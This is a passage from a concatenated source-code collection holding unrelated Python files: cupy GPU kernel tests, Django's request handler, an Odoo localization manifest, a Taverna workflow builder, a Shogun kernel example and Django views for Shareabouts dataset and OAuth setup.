kernel4(7, self.arr1, size=2)
with self.raises_size_required():
kernel4(7, self.arr1)
def test_size_determined_by_output(self):
# All the input args are unsized, but the size can be determined by the
# output arg. size argument is not allowed.
# Raw input
kernel1 = self.create_kernel((True,), (False,))
kernel1(self.arr1, self.arr2)
with self.raises_size_not_allowed():
kernel1(self.arr1, self.arr2, size=2)
# Scalar input
kernel2 = self.create_kernel((False,), (False,))
kernel2(self.arr1, self.arr2)
with self.raises_size_not_allowed():
kernel2(7, self.arr2, size=2)
# No input
kernel3 = self.create_kernel((), (False,))
kernel3(self.arr1)
with self.raises_size_not_allowed():
kernel3(self.arr1, size=2)
def test_no_input_and_raw_output(self):
# No input and the given output is raw -> size required
kernel1 = self.create_kernel((), (True,))
kernel1(self.arr1, size=2)
with self.raises_size_required():
kernel1(self.arr1)
@testing.parameterize(*testing.product({
'value': [-1, 2 ** 32, 2 ** 63 - 1, -(2 ** 63)],
}))
class TestUserkernelScalar(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_scalar(self, xp, dtype):
x = testing.shaped_arange((2, 3, 4), xp, dtype)
if xp is numpy:
y = numpy.array(self.value).astype(dtype)
return x + y
else:
kernel = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
return kernel(x, self.value)
class TestUserkernelManualBlockSize(unittest.TestCase):
def test_invalid_block_size(self):
x = testing.shaped_arange((2, 3, 4), cupy, cupy.float32)
kernel = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
with pytest.raises(ValueError):
kernel(x, 1, block_size=0)
def test_block_size(self):
x = testing.shaped_arange((2, 3, 4), cupy, cupy.float32)
kernel = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
y = kernel(x, 1, block_size=1)
testing.assert_array_equal(y, x + 1)
@testing.parameterize(*testing.product({
'dimensions': ((64, 0, 0), (64, 32, 0), (64, 32, 19)),
}))
@testing.gpu
@pytest.mark.skipif(runtime.is_hip,
reason='texture support on HIP is not yet implemented')
class TestElementwiseKernelTexture(unittest.TestCase):
def _prep_texture(self):
width, height, depth = self.dimensions
dim = 3 if depth != 0 else 2 if height != 0 else 1
# generate input data and allocate output buffer
shape = (depth, height, width) if dim == 3 else \
(height, width) if dim == 2 else \
(width,)
self.shape = shape
# prepare input, output, and texture memory
# self.data holds the data stored in the texture memory
tex_data = cupy.random.random(shape, dtype=cupy.float32)
ch = ChannelFormatDescriptor(32, 0, 0, 0,
runtime.cudaChannelFormatKindFloat)
arr = CUDAarray(ch, width, height, depth)
arr.copy_from(tex_data)
self.data = tex_data
# create resource and texture descriptors
res = ResourceDescriptor(runtime.cudaResourceTypeArray, cuArr=arr)
address_mode = (runtime.cudaAddressModeClamp,
runtime.cudaAddressModeClamp)
tex = TextureDescriptor(address_mode, runtime.cudaFilterModePoint,
runtime.cudaReadModeElementType)
# create a texture object
return TextureObject(res, tex)
def _prep_kernel1D(self):
return cupy.ElementwiseKernel(
'T x, U texObj',
'T y',
'''
T temp = tex1D<T>(texObj,
float(i)
);
y = temp + x;
''', name='test_tex1D')
def _prep_kernel2D(self):
return cupy.ElementwiseKernel(
'T x, U texObj, uint64 width',
'T y',
'''
T temp = tex2D<T>(texObj,
(float)(i % width),
(float)(i / width)
);
y = temp + x;
''', name='test_tex2D')
def _prep_kernel3D(self):
return cupy.ElementwiseKernel(
'T x, U texObj, uint64 width, uint64 height',
'T y',
'''
T temp = tex3D<T>(texObj,
(float)((i % (width * height)) % width),
(float)((i % (width * height)) / width),
(float)((i / (width * height)))
);
y = temp + x;
''', name='test_tex3D')
def test_texture_input(self):
width, height, depth = self.dimensions
dim = 3 if depth != 0 else 2 if height != 0 else 1
texobj = self._prep_texture()
ker = getattr(self, f'_prep_kernel{dim}D')()
# prepare input
args = [None, texobj]
size = width
if height > 0:
size *= height
args.append(width)
if depth > 0:
size *= depth
args.append(height)
in_arr = cupy.arange(size, dtype=cupy.float32)
in_arr = in_arr.reshape(self.shape)
args[0] = in_arr
# compute and validate output
out_arr = ker(*args)
expected = in_arr + self.data
testing.assert_allclose(out_arr, expected)
| cupy/cupy | tests/cupy_tests/core_tests/test_userkernel.py | Python | mit | 12,653 |
__author__ = 'Yunxi Lin'
from pages.BasePage import BasePage
class ApprovalPage(BasePage):
def print_display(self):
self.logger.info('Approved Page displayed') | jchen7960/python_framework | pages/ApprovalPage.py | Python | mit | 172 |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# This module is Copyright (c) 2009-2013 General Solutions (http://gscom.vn) All Rights Reserved.
{
"name" : "Vietnam Chart of Accounts",
"version" : "1.0",
"author" : "General Solutions",
'website': 'http://gscom.vn',
"category" : "Localization/Account Charts",
"description": """
This is the module to manage the accounting chart for Vietnam in OpenERP.
=========================================================================
This module applies to companies in Vietnam that follow the Vietnamese Accounting Standard (VAS).
**Credits:** General Solutions.
""",
"depends" : ["account","base_vat","base_iban"],
"data" : ["account_chart.xml","account_tax.xml","account_chart_template.yml"],
"demo" : [],
"installable": True,
}
| tvtsoft/odoo8 | addons/l10n_vn/__openerp__.py | Python | agpl-3.0 | 853 |
import sys
from django import http
from django.core import signals
from django.utils.encoding import force_unicode
from django.utils.importlib import import_module
from django.utils.log import getLogger
logger = getLogger('django.request')
class BaseHandler(object):
# Changes that are always applied to a response (in this order).
response_fixes = [
http.fix_location_header,
http.conditional_content_removal,
http.fix_IE_for_attach,
http.fix_IE_for_vary,
]
def __init__(self):
self._request_middleware = self._view_middleware = self._template_response_middleware = self._response_middleware = self._exception_middleware = None
def load_middleware(self):
"""
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
"""
from django.conf import settings
from django.core import exceptions
self._view_middleware = []
self._template_response_middleware = []
self._response_middleware = []
self._exception_middleware = []
request_middleware = []
for middleware_path in settings.MIDDLEWARE_CLASSES:
try:
mw_module, mw_classname = middleware_path.rsplit('.', 1)
except ValueError:
raise exceptions.ImproperlyConfigured('%s isn\'t a middleware module' % middleware_path)
try:
mod = import_module(mw_module)
except ImportError as e:
raise exceptions.ImproperlyConfigured('Error importing middleware %s: "%s"' % (mw_module, e))
try:
mw_class = getattr(mod, mw_classname)
except AttributeError:
raise exceptions.ImproperlyConfigured('Middleware module "%s" does not define a "%s" class' % (mw_module, mw_classname))
try:
mw_instance = mw_class()
except exceptions.MiddlewareNotUsed:
continue
if hasattr(mw_instance, 'process_request'):
request_middleware.append(mw_instance.process_request)
if hasattr(mw_instance, 'process_view'):
self._view_middleware.append(mw_instance.process_view)
if hasattr(mw_instance, 'process_template_response'):
self._template_response_middleware.insert(0, mw_instance.process_template_response)
if hasattr(mw_instance, 'process_response'):
self._response_middleware.insert(0, mw_instance.process_response)
if hasattr(mw_instance, 'process_exception'):
self._exception_middleware.insert(0, mw_instance.process_exception)
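        # Note: response/exception middleware are inserted at position 0, so
        # they run in the reverse of the order they appear in
        # MIDDLEWARE_CLASSES, while request/view middleware run in the listed
        # order.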
# We only assign to this when initialization is complete as it is used
# as a flag for initialization being complete.
self._request_middleware = request_middleware
def get_response(self, request):
"Returns an HttpResponse object for the given HttpRequest"
from django.core import exceptions, urlresolvers
from django.conf import settings
try:
# Setup default url resolver for this thread, this code is outside
# the try/except so we don't get a spurious "unbound local
# variable" exception in the event an exception is raised before
# resolver is set
urlconf = settings.ROOT_URLCONF
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
try:
response = None
# Apply request middleware
for middleware_method in self._request_middleware:
response = middleware_method(request)
if response:
break
if response is None:
if hasattr(request, "urlconf"):
# Reset url resolver with a custom urlconf.
urlconf = request.urlconf
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
callback, callback_args, callback_kwargs = resolver.resolve(
request.path_info)
# Apply view middleware
for middleware_method in self._view_middleware:
response = middleware_method(request, callback, callback_args, callback_kwargs)
if response:
break
if response is None:
try:
response = callback(request, *callback_args, **callback_kwargs)
except Exception as e:
# If the view raised an exception, run it through exception
# middleware, and if the exception middleware returns a
# response, use that. Otherwise, reraise the exception.
for middleware_method in self._exception_middleware:
response = middleware_method(request, e)
if response:
break
if response is None:
raise
# Complain if the view returned None (a common error).
if response is None:
try:
view_name = callback.func_name # If it's a function
except AttributeError:
view_name = callback.__class__.__name__ + '.__call__' # If it's a class
raise ValueError("The view %s.%s didn't return an HttpResponse object." % (callback.__module__, view_name))
# If the response supports deferred rendering, apply template
# response middleware and the render the response
if hasattr(response, 'render') and callable(response.render):
for middleware_method in self._template_response_middleware:
response = middleware_method(request, response)
response = response.render()
except http.Http404 as e:
logger.warning('Not Found: %s', request.path,
extra={
'status_code': 404,
'request': request
})
if settings.DEBUG:
from django.views import debug
response = debug.technical_404_response(request, e)
else:
try:
callback, param_dict = resolver.resolve404()
response = callback(request, **param_dict)
except:
try:
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
signals.got_request_exception.send(sender=self.__class__, request=request)
except exceptions.PermissionDenied:
logger.warning(
'Forbidden (Permission denied): %s', request.path,
extra={
'status_code': 403,
'request': request
})
try:
callback, param_dict = resolver.resolve403()
response = callback(request, **param_dict)
except:
try:
response = self.handle_uncaught_exception(request,
resolver, sys.exc_info())
finally:
signals.got_request_exception.send(
sender=self.__class__, request=request)
except SystemExit:
# Allow sys.exit() to actually exit. See tickets #1023 and #4701
raise
except: # Handle everything else, including SuspiciousOperation, etc.
# Get the exception info now, in case another exception is thrown later.
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
# Reset URLconf for this thread on the way out for complete
# isolation of request.urlconf
urlresolvers.set_urlconf(None)
try:
# Apply response middleware, regardless of the response
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
response = self.apply_response_fixes(request, response)
except: # Any exception should be gathered and handled
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
return response
def handle_uncaught_exception(self, request, resolver, exc_info):
"""
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
"""
from django.conf import settings
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
logger.error('Internal Server Error: %s', request.path,
exc_info=exc_info,
extra={
'status_code': 500,
'request': request
}
)
if settings.DEBUG:
from django.views import debug
return debug.technical_500_response(request, *exc_info)
# If Http500 handler is not installed, re-raise last exception
if resolver.urlconf_module is None:
raise exc_info[1], None, exc_info[2]
# Return an HttpResponse that displays a friendly error message.
callback, param_dict = resolver.resolve500()
return callback(request, **param_dict)
def apply_response_fixes(self, request, response):
"""
Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
"""
for func in self.response_fixes:
response = func(request, response)
return response
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
from django.conf import settings
if settings.FORCE_SCRIPT_NAME is not None:
return force_unicode(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = environ.get('SCRIPT_URL', u'')
if not script_url:
script_url = environ.get('REDIRECT_URL', u'')
if script_url:
return force_unicode(script_url[:-len(environ.get('PATH_INFO', ''))])
return force_unicode(environ.get('SCRIPT_NAME', u''))
| lzw120/django | django/core/handlers/base.py | Python | bsd-3-clause | 11,893 |
# Copyright (C) 2013 Cardiff University
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
__all__ = ("Workflow",)
import uuid
from t2base import *
from t2types import T2FlowType, List
from t2annotation import Annotation
from t2activity import Activity, NestedWorkflow, TextConstant
from t2task import WorkflowTasks
from t2util import alphanumeric
from balc_version import version
def getUUID():
return uuid.uuid4()
class WorkflowPort(Port):
def __init__(self, name, type):
Port.__init__(self, name, type)
self.annotations = {}
for name in ('description', 'example'):
if type.hasAnnotation(name):
setattr(self, name, type.getAnnotation(name))
@property
def description(self):
try:
return self.annotations['net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription']
except KeyError:
raise AttributeError('description')
@description.setter
def description(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription'] = value
@property
def example(self):
try:
return self.annotations['net.sf.taverna.t2.annotation.annotationbeans.ExampleValue']
except KeyError:
raise AttributeError('example')
@example.setter
def example(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.ExampleValue'] = value
class WorkflowInputPort(WorkflowPort, Source):
def __init__(self, flow, name, type):
Source.__init__(self, flow)
WorkflowPort.__init__(self, name, type)
def asSourcePort(self):
return self
def getIterationDepth(self):
return 0
def link(self, other):
assert isinstance(other, Sink), other
self.flow.linkData(self, other)
def exportInputPortXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.port as port:
port.name >> self.name
depth = self.getDepth()
port.depth >> depth
port.granularDepth >> depth
with port.annotations:
for annotationClass, annotation in self.annotations.items():
annotation.exportXML(xml, annotationClass)
def exportSourceXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.source(type="dataflow"):
tav.port >> self.name
class WorkflowOutputPort(WorkflowPort, Sink):
def __init__(self, flow, name, type):
Sink.__init__(self, flow)
WorkflowPort.__init__(self, name, type)
def asSinkPort(self):
return self
def addIterationDepth(self, depth):
if depth > 0:
raise RuntimeError('require additional "%s" for "| %s"' % ('-' * depth, self.name))
elif depth < 0:
raise RuntimeError('too many collects')
def link(self, other):
assert isinstance(other, Source), other
self.flow.linkData(other, self)
def exportOutputPortXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.port as port:
port.name >> self.name
with port.annotations:
for annotationClass, annotation in self.annotations.items():
annotation.exportXML(xml, annotationClass)
def exportSinkXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.sink(type="dataflow"):
tav.port >> self.name
class WorkflowPorts(Ports):
def __getitem__(self, name):
return self.__getattr__(name)
def __setitem__(self, name, type):
return self.__setattr__(name, type)
def __setattr__(self, name, type):
# flow.input.name = type
if self._.ports.has_key(name):
raise RuntimeError('port "%s" redefined' % name)
if isinstance(type, Port):
other = type
type = other.type
elif isinstance(type, T2FlowType):
other = None
else:
raise TypeError('port "%s" must be assigned a type' % name)
port = self._.ports[name] = self._.PortClass(self._.flow, name, type)
self._.order.append(name)
if other is not None:
port.link(other)
def __getattr__(self, name):
if self._.ports.has_key(name):
return self._.ports[name] # return an existing typed port
return self(name) # return a new untyped port
class UntypedInputPort:
def __init__(self, flow, name):
self.flow = flow
self.name = name
def __or__(self, sink):
return self.flow.linkData(self, sink)
class WorkflowInputPorts(WorkflowPorts):
def __init__(self, flow):
WorkflowPorts.__init__(self, flow)
self._.PortClass = WorkflowInputPort
def __call__(self, name):
# this should be called untypedPort(), but that would pollute the
# namespace that this class represents, so we use __call__ as a hack
return UntypedInputPort(self._.flow, name)
class UntypedOutputPort:
def __init__(self, flow, name):
self.flow = flow
self.name = name
def __ror__(self, source):
return self.flow.linkData(source, self)
def __pos__(self):
return SplayDepthChange(self)
def __neg__(self):
return CollectDepthChange(self)
def __invert__(self):
return WrapDepthChange(self)
class WorkflowOutputPorts(WorkflowPorts):
def __init__(self, flow):
WorkflowPorts.__init__(self, flow)
self._.PortClass = WorkflowOutputPort
def __call__(self, name):
# this should be called untypedPort(), but that would pollute the
# namespace that this class represents, so we use __call__ as a hack
return UntypedOutputPort(self._.flow, name)
class DataLink:
def __init__(self, source, sink):
self.source = source
self.sink = sink
def exportXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.datalink:
self.source.exportSourceXML(xml)
self.sink.exportSinkXML(xml)
def tavernaName(title):
# Taverna creates the workflow name from the title annotation's first 20 characters,
# with non-alphanumeric characters replaced by underscore
name = []
for ch in title[:20]:
if ch in alphanumeric:
name.append(ch)
else:
name.append('_')
return ''.join(name)
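# Added standalone illustration: assuming t2util.alphanumeric is the set of
# ASCII letters and digits, tavernaName keeps the first 20 characters of the
# title and maps everything else to '_'. The helper below reproduces that rule
# without depending on this package.
def _demo_taverna_name(title,
                       alphanumeric='abcdefghijklmnopqrstuvwxyz'
                                    'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
    return ''.join(ch if ch in alphanumeric else '_' for ch in title[:20])
assert _demo_taverna_name('My Workflow: 2013 run') == 'My_Workflow__2013_ru'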
class Workflow(object):
def __init__(self, title="Workflow", author=None, description=None):
self.id = getUUID()
self.annotations = {}
self.dataLinks = []
self.ctrlLinks = []
self.input = WorkflowInputPorts(self)
self.output = WorkflowOutputPorts(self)
self.task = WorkflowTasks(self)
self.title = title
if author is not None:
self.author = author
if description is not None:
self.description = description
def getId(self):
return self.id
def getInputs(self):
inputs = {}
for port in self.input:
inputs[port.name] = port.type
return inputs
def getOutputs(self):
outputs = {}
for port in self.output:
outputs[port.name] = port.type
return outputs
@property
def title(self):
return self.annotations.get('net.sf.taverna.t2.annotation.annotationbeans.DescriptiveTitle')
@title.setter
def title(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.DescriptiveTitle'] = value
self.name = tavernaName(value.text)
@property
def author(self):
return self.annotations.get('net.sf.taverna.t2.annotation.annotationbeans.Author')
@author.setter
def author(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.Author'] = value
@property
def description(self):
return self.annotations.get('net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription')
@description.setter
def description(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription'] = value
def isWorkbenchSafe(self):
# If this is set to False, RServe activities will use direct mapping of
# dotted names. Taverna Engine is OK with this, but Workbench cannot
# display the links or edit the component.
# If it is True, the RServe activity will add lines to the start and
# end of the script to map to Workbench-friendly names inside the script.
return True
def selectUniqueLabel(self, namespace, candidate):
i = 1
label = candidate
while label in namespace:
i += 1
label = '%s_%d' % (candidate, i)
return label
def addActivity(self, activity, candidate=None):
if candidate is None:
if activity.name is None:
candidate = activity.__class__.__name__
else:
candidate = activity.name
label = self.selectUniqueLabel(self.task, candidate)
task = self.task[label] << activity
return task
def linkData(self, source, sink):
if isinstance(source, DepthChange):
source = source.base
depthChange = 0 # the depth change indicated by the pipe
depthChangeByIteration = False
if isinstance(sink, DepthChange):
depthChange = sink.depthChange
if isinstance(sink, SplayDepthChange):
depthChange = -depthChange
depthChangeByIteration = True
elif isinstance(sink, CollectDepthChange):
depthChangeByIteration = True
sink = sink.base
if isinstance(source, basestring):
source = self.addActivity(TextConstant(source), sink.name)
elif isinstance(source, Activity):
source = self.addActivity(source)
if isinstance(sink, Activity):
sink = self.addActivity(sink)
# need to sort activities out before untyped sinks, so that type
# mapping will work
if isinstance(source, UntypedInputPort):
if isinstance(sink, UntypedOutputPort):
raise RuntimeError('cannot pipe input port to output port without declaring type')
type = sink.asSinkPort().type
if depthChange < 0:
for i in range(-depthChange):
type = List[type]
self.input[source.name] = type
source = self.input[source.name]
if isinstance(sink, UntypedOutputPort):
type = source.asSourcePort().type
if depthChange > 0:
for i in range(depthChange):
type = List[type]
self.output[sink.name] = type
sink = self.output[sink.name]
pipe = Pipeline(self, source, sink)
source = source.asSourcePort()
sink = sink.asSinkPort()
if source.type.getDepth() + depthChange != sink.type.getDepth():
raise RuntimeError('%s | %s: depths %d - %d != %d expected difference' % (source, sink, source.type.getDepth(), sink.type.getDepth(), depthChange))
validator = sink.type.validator(source.type)
if validator is not None:
task = self.addActivity(validator, 'Validate_' + source.name)
self.dataLinks.append(DataLink(source, task.asSinkPort()))
self.dataLinks.append(DataLink(task.asSourcePort(), sink))
else:
self.dataLinks.append(DataLink(source, sink))
iterationDepth = source.getIterationDepth()
if depthChangeByIteration:
iterationDepth -= depthChange
sink.addIterationDepth(iterationDepth)
return pipe
def sequenceTasks(self, task1, task2):
self.ctrlLinks.append((task1, task2))
def allDescendants(self, descendants=None):
# Create a list of all nested workflows and their nested workflows, ad infinitum
if descendants is None:
descendants = []
for task in self.task:
for activity in task.activities:
if isinstance(activity, NestedWorkflow):
flow = activity.flow
descendants.append(flow)
flow.allDescendants(descendants)
return descendants
def exportXML(self, xml):
# The uuidCache ensures that if a nested workflow is referenced more than once,
# it is only added to the file once.
uuidCache = set()
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.workflow(version=1, producedBy=getCreator()):
self.exportXMLDataflow(xml, 'top')
for flow in self.allDescendants():
if flow.id not in uuidCache:
uuidCache.add(flow.id)
flow.exportXMLDataflow(xml, 'nested')
def exportXMLDataflow(self, xml, role):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.dataflow(id=self.id, role=role):
tav.name >> self.name
with tav.inputPorts:
for port in self.input:
port.exportInputPortXML(xml)
with tav.outputPorts:
for port in self.output:
port.exportOutputPortXML(xml)
with tav.processors:
for processor in self.task:
processor.exportXML(xml)
with tav.conditions:
for task1, task2 in self.ctrlLinks:
tav.condition(control=task1.name, target=task2.name)
with tav.datalinks:
for link in self.dataLinks:
link.exportXML(xml)
with tav.annotations:
for annotationClass, annotation in self.annotations.items():
annotation.exportXML(xml, annotationClass)
def getCreator():
from subprocess import check_output
import os
import traceback
gitTag = ''
try:
balcazapy_home = os.environ['BALCAZAPY_HOME']
words = check_output(["git", "show-ref", "--hash=8"], cwd=balcazapy_home).split()
gitTag = " " + words[0]
if check_output(["git", "ls-files", "-m"], cwd=balcazapy_home).strip():
gitTag += ' with local modifications'
except:
traceback.print_exc()
creator = 'Balcazapy %s%s' % (version, gitTag)
return creator
| jongiddy/balcazapy | python/balcaza/t2flow.py | Python | lgpl-2.1 | 16,002 |
#!/usr/bin/env python
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
parameter_list=[[traindat,testdat, 1.3],[traindat,testdat, 1.4]]
def kernel_gaussian_modular (train_fname=traindat,test_fname=testdat, width=1.3):
from modshogun import RealFeatures, GaussianKernel, CSVFile
feats_train=RealFeatures(CSVFile(train_fname))
feats_test=RealFeatures(CSVFile(test_fname))
kernel=GaussianKernel(feats_train, feats_train, width)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
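# Added hedged sketch, independent of Shogun: GaussianKernel is commonly
# documented for Shogun as k(x, y) = exp(-||x - y||^2 / width); the NumPy
# helper below assumes that parameterisation and only illustrates the shape of
# the computation above, e.g. (3, 2) and (4, 2) feature matrices give a
# (3, 4) kernel matrix.
def _demo_gaussian_kernel(X, Y, width=1.3):
    import numpy
    sq_dists = ((X[:, None, :] - Y[None, :, :]) ** 2).sum(axis=-1)
    return numpy.exp(-sq_dists / width)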
if __name__=='__main__':
print('Gaussian')
kernel_gaussian_modular(*parameter_list[0])
| AzamYahya/shogun | examples/undocumented/python_modular/kernel_gaussian_modular.py | Python | gpl-3.0 | 695 |
import json
import re
import requests
from requests.auth import HTTPBasicAuth
from django.conf import settings
from django.http import HttpResponse, Http404
from django.contrib.auth.decorators import login_required
from django.core.signing import Signer
from planbox_data.models import Project
from shareabouts_integration.models import Preauthorization
from shareabouts_integration.oauth_dance import get_auth_header, get_authorization_code, get_credentials
from raven.contrib.django.models import client
def bad_request(errors):
return HttpResponse(json.dumps(errors), status=400, content_type='application/json')
@login_required
def oauth_credentials(request):
"""
    How do we correlate Planbox and Shareabouts users? Matching on username is
    fragile but simple. With normal OAuth we wouldn't have this issue, because
    the user would specify their own account.
But for now, there's only one user to support.
"""
host = 'https://' + settings.SHAREABOUTS_HOST
client_id = settings.SHAREABOUTS_CLIENT_ID
client_secret = settings.SHAREABOUTS_CLIENT_SECRET
# Make sure a project ID is specified
project_id = request.GET.get('project_id')
try:
project = Project.objects.all().get(pk=project_id)
except Project.DoesNotExist:
return bad_request([{'project_id': 'Project does not exist.'}])
# Make sure the user has edit permission on the project.
if not project.editable_by(request.user):
return HttpResponse('Unauthorized', status=401)
# Get the preauthorization object for the project.
try:
auth = Preauthorization.objects.get(project=project)
except Preauthorization.DoesNotExist:
raise Http404
username = auth.username
# Get the requested credentials from the Shareabouts API server
session = requests.session()
try:
auth_header = get_auth_header(client_id, client_secret, username)
authorization_code = get_authorization_code(session, host, client_id, auth_header)
credentials = get_credentials(session, host, authorization_code, client_id, client_secret)
except AssertionError:
if settings.DEBUG: raise
client.captureException()
return HttpResponse('Upstream error occurred.',
status=502,
content_type='text/plain')
return HttpResponse(json.dumps(credentials, indent=2, sort_keys=True),
status=200,
content_type='application/json')
@login_required
def create_dataset(request):
"""
Create a dataset under the account specified in the settings with the
name provided in the 'dataset_slug' query parameter.
"""
# We should only be allowed to POST to this view.
if request.method.upper() != 'POST':
return HttpResponse('Method not allowed', status=405)
# Do some simple validation on the slug. We don't allow empty slugs.
slug = request.POST.get('dataset_slug', '')
if len(slug) == 0:
return HttpResponse(
json.dumps({'errors': [{'dataset_slug': 'This field is required.'}]}),
content_type='application/json', status=400)
datasets_url = 'https://%s/api/v2/%s/datasets' % (
settings.SHAREABOUTS_HOST,
settings.SHAREABOUTS_USERNAME)
dataset_url = '/'.join([datasets_url, slug])
planbox_auth = HTTPBasicAuth(
settings.SHAREABOUTS_USERNAME,
settings.SHAREABOUTS_PASSWORD)
# Try to retrieve the dataset.
ds_response = requests.get(dataset_url, auth=planbox_auth)
# If the dataset exists already; nothing to do, since we assume that a
# CORS permission profile is already created.
if ds_response.status_code == 200:
return HttpResponse(
json.dumps({'url': ds_response.json()['url']}),
content_type='application/json')
# If the dataset was not reported as existing but we didn't get a 404 back
# then we have some error response and should send a 502 down.
elif ds_response.status_code != 404:
return HttpResponse(
json.dumps({'errors': 'Unknown upstream problem.'}),
status=502,
content_type='application/json')
# If the dataset did not exist, create it.
ds_response = requests.post(datasets_url,
data=json.dumps({'slug': slug, 'display_name': slug}),
headers={'Content-type': 'application/json'},
auth=planbox_auth)
# Check that we were successful in creating the dataset.
if ds_response.status_code == 201:
ds_url = ds_response.json()['url']
# Set CORS permissions on the dataset.
success = add_dataset_permissions(ds_url, request.META['HTTP_HOST'], planbox_auth)
if not success:
return HttpResponse(json.dumps({'errors': 'Failed to add access permissions on the dataset.'}),
status=502, content_type='application/json')
# Return the dataset URL as well as a signature that we'll use later
# when we authorize the user to access the Shareabouts API as the
# dataset's owner.
signer = Signer(salt='shareabouts')
return HttpResponse(
json.dumps({
'dataset_url': ds_url,
'signature': signer.sign(ds_url)
}),
content_type='application/json')
elif ds_response.status_code < 500:
client.captureMessage('Failed to create a dataset with Shareabouts API response %s %s' % (ds_response.status_code, ds_response.content))
return HttpResponse(ds_response.content,
status=ds_response.status_code,
content_type='application/json')
else:
client.captureMessage('Failed to create a dataset with Shareabouts API response %s %s' % (ds_response.status_code, ds_response.content))
return HttpResponse(json.dumps({'errors': 'Unknown upstream problem.'}),
status=502,
content_type='application/json')
def add_dataset_permissions(dataset_url, host, shareabouts_auth):
    # Try to add CORS permissions for the given host to access the dataset.
# Retry up to 5 times.
origins_url = dataset_url + '/origins'
retries = 5
for _ in range(retries):
origins_response = requests.post(origins_url, auth=shareabouts_auth, data={'pattern': host})
if origins_response.status_code == 201:
return True
else:
client.captureMessage('Failed to add permissions for host %s in dataset at %s: %s %s' % (host, dataset_url, origins_response.status_code, origins_response.content))
continue
return False
@login_required
def authorize_project(request):
# We should only be allowed to POST to this view.
if request.method.upper() != 'POST':
return HttpResponse('Method not allowed', status=405)
dataset_url = request.POST.get('dataset_url', '')
signature = request.POST.get('signature', '')
project_id = request.POST.get('project_id', '')
# Make sure all fields are present.
errors = []
if not dataset_url: errors.append({'dataset_url': 'This field is required.'})
if not signature: errors.append({'signature': 'This field is required.'})
if not project_id: errors.append({'project_id': 'This field is required.'})
if errors:
return bad_request(errors)
# Make sure the signature is valid.
signer = Signer(salt='shareabouts')
if signature != signer.sign(dataset_url):
return bad_request([{'signature': 'Invalid signature.'}])
# Parse out the owner username.
owner_pattern = '^https://%s/api/v2/([^/]+)/datasets' % (settings.SHAREABOUTS_HOST,)
match = re.match(owner_pattern, dataset_url)
if not match:
return bad_request([{'dataset_url': 'Could not find username.'}])
owner_username = match.group(1)
# Query for the project object.
try:
project = Project.objects.all().get(pk=project_id)
except Project.DoesNotExist:
return bad_request([{'project_id': 'Project does not exist.'}])
# Make sure the user has edit permission.
if not project.editable_by(request.user):
return HttpResponse('Unauthorized', status=401)
# Ensure that a preauthorization for the project exists.
auth, _ = Preauthorization.objects.get_or_create(project=project)
